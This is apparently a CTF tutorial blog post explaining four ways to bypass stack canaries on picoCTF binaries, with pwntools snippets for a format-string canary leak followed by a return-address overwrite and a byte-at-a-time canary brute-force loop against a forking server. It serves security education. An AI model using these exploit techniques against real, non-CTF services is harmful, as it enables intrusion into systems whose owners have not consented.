June 11, 2026

Stack Canary Bypass for CTF: Leak It, Brute It, or Walk Around It

Stuck at '*** stack smashing detected ***' on a picoCTF binary? Stack canary bypass, three ways: leak it with a format string, brute-force it across forks, or never cross it at all.

The wall and the speed bump

You found the overflow. Your offset is right, cyclic gave you a clean number, and you send the payload expecting a shell. Instead the program prints *** stack smashing detected ***: terminated and dies with an abort. That message is a stack canary doing its job: a random value the compiler slipped between your buffer and the saved return address, checked right before the function returns. Overwrite the return address with a linear overflow and you also overwrite the canary, the check fails, and the process kills itself before your address ever loads.

The first time I hit this I assumed I had botched the offset and spent twenty minutes re-running cyclic. The offset was fine. I just had not run checksec, so I never noticed the binary had a guard I needed to deal with. Here is the thing that would have saved me the twenty minutes: a canary is a speed bump, not a wall. It guards exactly one route, and there are a handful of standard ways around it.

The canary does not protect the return address. It protects one road to it: a contiguous overflow, checked once at ret.

That reframe is the whole article. Stop asking "how do I defeat the canary" and start asking "do I even need to cross it?" Once you do, the bypasses sort themselves into two branches. You either satisfy the check (make sure the right canary value is sitting there when ret runs) or you avoid the check (reach your target without a changed canary ever reaching the comparison). Here is the map before the details.

BranchBypassUse whenpicoCTF receipt
A: satisfyLeak itYou can read stack memory (format string, out-of-bounds read)guessing game 2
A: satisfyBrute-force itThe server forks per connection, or the canary is staticbuffer overflow 3
B: avoidHit a target below the canaryA function pointer or data local sits between the buffer and the canarybabygame02
B: avoidWrite straight to the return addressYou have an arbitrary write (format string %n) and skip the overflow entirelyecho valley

If you do not already know how a plain stack overflow works, start with the Buffer Overflow guide and come back. Everything below assumes you can already smash a return address when nothing is in the way.

What a canary actually guards

When you compile with stack protection on, the function prologue copies a secret value onto the stack just above the local variables, and the epilogue checks it before ret. On x86-64 with glibc the value lives in thread-local storage at %fs:0x28, exposed to C as __stack_chk_guard. It is set once, at process startup, from the kernel-supplied AT_RANDOM bytes in the auxiliary vector. The compiled check is small and always the same shape:

; function epilogue, right before ret
mov rax, QWORD PTR fs:0x28 ; load the real canary
xor rax, QWORD PTR [rbp-0x8] ; compare against the stack copy
je .ok ; equal? carry on to ret
call __stack_chk_fail ; different? abort()

__stack_chk_fail is the thing that prints *** stack smashing detected *** and calls abort(). It is marked noreturn, so there is no clever way to fall through it. The check is honest and cheap. That is the point of canaries: one random qword and four instructions per guarded function, in exchange for catching the most common memory-corruption bug class. As a defense it is a genuinely good trade. As an obstacle in front of you, it is narrow.

Takeaway

The canary only sees a change if a contiguous overflow runs through it, and it only reacts at ret. Anything below it on the frame, and any write that does not return through that epilogue, is out of its jurisdiction.

One detail on that diagram does a lot of work later: on glibc the canary's least-significant byte is a null. The compiler forces it so that string functions like strcpy and %s stop at the canary instead of cleanly copying through it. That null byte cuts both ways. It makes the canary slightly easier to spot when you leak the stack (it is the qword ending in 00) and it drops a 64-bit brute-force from eight unknown bytes to seven. Defenders gave up a little entropy to stop a different attack, and that is a tradeoff you get to exploit.

Step 0: is there even a canary?

Before you pick a bypass, spend ten seconds confirming the problem exists. checksec (ships with pwntools) tells you in one line.

$ checksec --file=./vuln
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found <- this is your speed bump
NX: NX enabled
PIE: PIE enabled

If it says No canary found, you are done reading this post: go overwrite the return address. If it says Canary found, the other lines already tell you which downstream fight you are in. NX enabled (no-execute) means no shellcode on the stack, so getting past the canary leads into ROP. PIE enabled means you also need a code or stack leak, covered in the ASLR and PIE Bypass post. The canary is rarely the only thing standing between you and the flag, but it is usually the first.

Tip: Read checksec as a shopping list, not a verdict. "Canary found, Full RELRO, PIE" is not "impossible," it is "you need a leak, and the leak probably solves the canary for free." One format-string bug often pays for all three at once.

Branch A: satisfy the check

In this branch the canary check still runs and still compares. You just make sure the value it finds on the stack matches the real one. There are two ways to know the value: read it, or guess it one byte at a time.

Leak it with a format string

The canary is a local variable. If you can read the stack, you can read the canary, and the cleanest stack-read primitive in CTF is a format string bug, a printf(user_input) with no format string of its own. Each %p prints the next stack slot, and %n$p jumps straight to slot n. So the workflow is: find which slot reflects your own input, count up to the canary's slot, leak it, then drop that exact value back into your overflow so the epilogue XOR comes out zero.

guessing game 2 is the textbook version. It is a 32-bit binary with Full RELRO, NX, and a canary, plus both a format string bug and a buffer overflow. The input buffer shows up at format parameter 7. The buffer is 512 bytes, which is 128 four-byte slots, so the canary sits at parameter 7 + 128 = 135. One request leaks it:

from pwn import *
io = remote('saturn.picoctf.net', 12345)
# leak the canary directly at its stack parameter
io.sendline(b'%135$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#x}') # ends in 00 on a real glibc canary
# now overflow, but write the real canary back into its slot
payload = b'A' * 512 # fill the buffer
payload += p32(canary) # canary unchanged -> check passes
payload += b'B' * 4 # saved EBP
payload += p32(elf.sym['win']) # saved EIP
io.sendline(payload)
Warning: Leak with %p or %lx, never %s. The canary ends in a null byte, and %s dereferences and reads until a null, so it either stops short or chases a garbage pointer. You want the raw stack slot, not a string starting at it.

If you are fuzzy on finding the parameter offset or turning %p chains into a targeted read, the Format String guide walks the whole primitive. The only canary-specific trick is recognizing the leak: it is the qword (or dword) ending in 00, sitting where the frame layout says the canary should be.

Takeaway

A format string bug in the same function as the overflow is the easiest canary bypass there is. Leak the slot ending in 00, paste it back into the payload, and the guard waves you through.

Brute-force it across forks

No leak? Sometimes you can guess the canary one byte at a time, and the precondition is specific: the same canary has to survive across your attempts. That happens in two situations. The common one is a forking server. When a process calls fork(), the child is a byte-for-byte copy of the parent, including the canary, the ELF base, and the libc base. If the server forks a fresh worker per connection and the worker crashing does not re-randomize anything, every connection hands you the identical canary.

That turns the check into an oracle. Fill the buffer up to the canary, append one guessed byte, and see what happens. If the connection survives, the byte was correct. If the child aborts, it was wrong, try the next value. Lock in each correct byte as the prefix for the next position. The math is friendly: a 64-bit canary has a known null low byte, so seven unknown bytes at up to 256 guesses each is at most about 1,792 connections, and roughly 896 on average. Compare that to 2 to the 56th if you tried to guess all seven at once.

from pwn import *
canary = b'\x00' # glibc canary's low byte is null
while len(canary) < 8:
for guess in range(256):
io = remote(HOST, PORT)
io.send(b'A' * OFFSET + canary + bytes([guess]))
if b'smashing' not in io.recvall(timeout=1):
canary += bytes([guess]) # survived -> byte is correct
io.close()
break
io.close()
log.success(f'canary = {canary.hex()}')

The picoCTF sibling is buffer overflow 3, which strips the problem down to its core. It is a 32-bit binary whose 4-byte canary is read from a file, so it is literally static across runs, no fork required, and you brute-force all four bytes byte-by-byte with the crash message as the oracle. The recovered canary is the ASCII string BiRd, and the flag it hands back is picoCTF{Stat1C_c4n4r13s_4R3_b4D_...}. The challenge moralizes at you through the flag itself: static canaries are bad. So, it turns out, are brute-forceable ones.

Note: This is not just a CTF toy. The BROP attack ("Hacking Blind," Bittau et al., IEEE S&P 2014) brute-forces the canary and return address of a forking server with no binary at all. Their named example is nginx, which forks workers without re-randomizing. The exact byte-at-a-time oracle you use on a picoCTF binary is the same primitive that read a real web server's stack blind.
Takeaway

Brute force needs the canary to repeat: a fork server that does not re-randomize, or a static canary. When it repeats, the crash-or-survive signal collapses a 56-bit secret to about 900 connections.

Branch B: don't cross the canary

Branch A is the obvious branch, and it is the one most tutorials stop at. Branch B is where the reframe pays off, so this is the part worth slowing down for. The canary only matters if a changed copy of it reaches the comparison at ret. Two kinds of exploit never make that happen: ones that hit a target sitting below the canary, and ones that do not use a contiguous overflow at all.

Hit a target below the canary

Look at the frame diagram again. The canary sits between the buffer and the saved return address, but plenty of useful things live below it, between the buffer and the canary: other local variables, a loop counter, a flag, a function pointer the program is about to call. If the thing you need to corrupt is one of those, you never touch the canary. A linear overflow that stops short of the canary, or, more commonly, an out-of-bounds index that writes to a specific slot directly, lands on your target and the epilogue check sails through unchanged.

babygame02 is exactly this. It has an out-of-bounds array write, and instead of reaching for the return address it clobbers a single data variable, a counter the game logic checks, with one byte. The canary guards the saved return address and the saved frame pointer. It does not guard an adjacent integer. A one-byte write to that integer slips right past the check, because the check is never asked about it.

Key insight: Compilers know about this and fight back a little: -fstack-protector-strong reorders buffers above other locals so an overflow tends to hit the canary before it hits a sensitive variable. It is a real mitigation and it is also incomplete. Buffer reordering does nothing against an out-of-bounds index that computes the target address directly, which is why babygame02 works.

Write straight to the return address

The deepest version of "don't cross it" is to drop the overflow entirely. A format string write, %n and friends, is an arbitrary write-what-where. It does not march byte by byte from a buffer. It writes the bytes you choose at the address you choose. Point it at the saved return address on the stack, or at a GOT (Global Offset Table) entry, and the canary is irrelevant: you wrote to one specific location and nothing in between moved.

echo valley is the clean demonstration. checksec reports PIE, Full RELRO (read-only relocations), NX, and a canary, which looks intimidating, but the bug is a printf(buf). You leak a stack slot to defeat PIE, then use pwntools fmtstr_payload to write the address of print_flag directly onto the saved return address. As the writeup itself notes, the format-string write targets the return address "without corrupting the canary, so canary detection is not triggered." Full RELRO took the GOT off the table, so the saved return address is the target, and the canary that the whole binary advertises in checksec never gets a vote.

A canary assumes you will overflow the buffer. The moment you stop overflowing the buffer, it is guarding an empty hallway.
Takeaway

The strongest bypass is the one that makes the canary a non-event. Corrupt a target below it, or use an arbitrary write so there is no overflow to detect, and the guard never enters the picture.

Which bypass, in order

When checksec says Canary found, do not start typing. Ask these in order and stop at the first yes.

  1. Is your real target below the canary, a function pointer or a data local you can reach? Then ignore the canary and corrupt that. Branch B, no leak needed.
  2. Do you have an arbitrary write (a format string %n)? Write straight to the return address or GOT and skip the overflow. Branch B, no leak needed.
  3. Can you read stack memory (format string, out-of-bounds read)? Leak the slot ending in 00 and replay it in your overflow. Branch A.
  4. Does the server fork, or is the canary static? Brute-force it one byte at a time. Branch A.
  5. None of the above? The canary is actually costing you something. Go find a leak primitive first; that is the honest answer, and it is rarer than beginners fear.

Notice the order. The bypasses that need nothing extra come first, and the ones that need a separate primitive come last. That is the opposite of how the techniques are usually taught, leak-first, because leaking is the one everybody learns first. In practice, "do I even need to cross it?" is the cheaper question, so ask it first.

Quick reference

BypassPreconditionKey move
LeakFormat-string readStack read primitive in the vulnerable functionFind the slot ending in 00, replay it in the payload
BruteByte-at-a-time oracleFork server with no re-randomization, or static canaryGuess each byte, survive = correct, ~896 tries on 64-bit
BelowCorrupt a target under the canaryFunction pointer or data local between buffer and canaryOOB index write straight to the slot, canary untouched
AroundArbitrary write to RIP / GOTFormat-string %n writefmtstr_payload to the saved return address, no overflow

Getting past the canary is rarely the last step. With NX on you land in ROP; with PIE on you still need the leak from the ASLR and PIE Bypass post; and the whole thing gets scripted with patterns from the pwntools guide. If you want to watch the canary check fire in slow motion, set a breakpoint on __stack_chk_fail using the GDB guide and step through the epilogue.

One concrete drill. Open guessing game 2 and echo valley side by side. Both have a canary and a format string. One leaks the canary and overflows past it; the other never overflows and never leaks the canary at all. Same protection, two branches. Once you can see why the second binary's canary is doing nothing, the message stack smashing detected stops being a wall and turns into a question: which branch is this?

The canary is a real cost. It turns "I overflowed the buffer" into "I overflowed the buffer and I have a leak, a fork, or a better target." That is a meaningful raise. It is just not a wall, and you should stop treating it like one.

Sources and further reading